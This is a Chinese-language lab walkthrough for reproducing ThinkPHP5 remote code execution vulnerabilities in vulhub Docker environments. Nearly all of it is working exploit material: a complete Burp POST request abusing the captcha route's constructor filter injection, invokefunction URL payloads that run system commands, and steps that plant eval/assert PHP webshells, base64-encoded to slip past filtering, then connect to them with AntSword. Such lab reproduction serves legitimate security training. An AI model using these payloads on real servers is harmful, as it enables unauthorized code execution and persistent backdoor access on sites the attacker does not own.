安装vulhub
- git clone https://github.com/vulhub/vulhub.git 下载vulhub。
2、安装docker-compose
1、复现ThinkPHP5 5.0.23
切换到vulhub/thinkphp/5.0.23-rce目录下,运行环境:docker-compose up -d
(1)burpsuite抓包。
(2)send to repeater,执行命令:
POST /index.php?s=captcha HTTP/1.1
Host: 192.xxx.xxx.xxx:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
(3)写入phpinfo:
`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`
(4)查看是否写入:
ls%20-al
cat%20/var/www/public/info.php
(5)访问查看:http://ip:8080/info.php
(6)上传shell:
echo%20"<?php%20@eval($_REQUEST['pass']);%20?>"%20>%20/var/www/public/pass.php
(7)查看:cat%20pass.php,发现被过滤了。
(8)内容base64编码:
echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php
该payload未编码前:
echo%20-n%20aaa<?php @assert($_POST['123']); ?>bbb%20|%20base64%20-d>%20/var/www/public/pass.php
(9)查看:cat%20pass.php
(10)访问:http://ip:8080/pass.php?123=phpinfo();
(11)蚁剑连接。
(12)右击选择文件管理。
2、复现ThinkPHP5 5.0.22/5.1.29
环境搭建:
cd /vulhub/thinkphp/5-rce
ls
修改端口映射:vim docker-compose.yml
将8080:80改为8087:80
docker-compose up -d
浏览器访问:
(1)POC:
①/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
②/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
利用phpinfo函数获取phpinfo:
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
(2)利用system函数,获取网站目录文件:
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
(3)写入文件:`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`
访问查看:http://ip:8087/info.php
(4)base64编码后上传shell:
echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php
编码内容:aaa<?php @assert($_REQUEST['123']); ?>bbb
Base64编码后:YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=
(5)访问:http://ip:8087/pass.php?123=phpinfo();
(6)蚁剑连接。
(7)右击选择文件管理。
实验总结: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。Thinkphp漏洞检测工具,可以检测到14个常见的Thinkphp漏洞。